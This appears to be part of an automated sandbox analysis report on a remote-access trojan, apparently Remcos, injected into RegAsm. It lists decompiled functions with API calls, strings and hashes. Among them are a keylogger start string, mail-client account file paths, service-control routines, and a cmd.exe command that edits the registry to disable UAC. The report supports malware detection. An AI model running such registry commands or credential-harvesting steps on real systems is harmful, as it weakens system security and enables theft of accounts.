                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                • String ID:
                                                                                • API String ID: 493672254-0
                                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                • _free.LIBCMT ref: 004482CC
                                                                                • _free.LIBCMT ref: 004482F4
                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                • _abort.LIBCMT ref: 00448313
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                • _free.LIBCMT ref: 10005B55
                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                • String ID:
                                                                                • API String ID: 221034970-0
                                                                                • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                • API String ID: 4036392271-1520055953
                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                Function 0040B19F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventLocalTimewsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                • API String ID: 1497725170-248792730
                                                                                • Opcode ID: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                • Opcode Fuzzy Hash: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                Function 00443AD3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: xX4
                                                                                • API String ID: 0-4134912787
                                                                                • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                                • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                                Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                • String ID: XQG
                                                                                • API String ID: 1958988193-3606453820
                                                                                • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                • String ID: 0$MsgWindowClass
                                                                                • API String ID: 2877667751-2410386613
                                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                Strings
                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateProcess
                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                • API String ID: 2922976086-4183131282
                                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                • String ID: KeepAlive | Disabled
                                                                                • API String ID: 2993684571-305739064
                                                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                • String ID: Alarm triggered
                                                                                • API String ID: 614609389-2816303416
                                                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                Strings
                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                • API String ID: 3024135584-2418719853
                                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
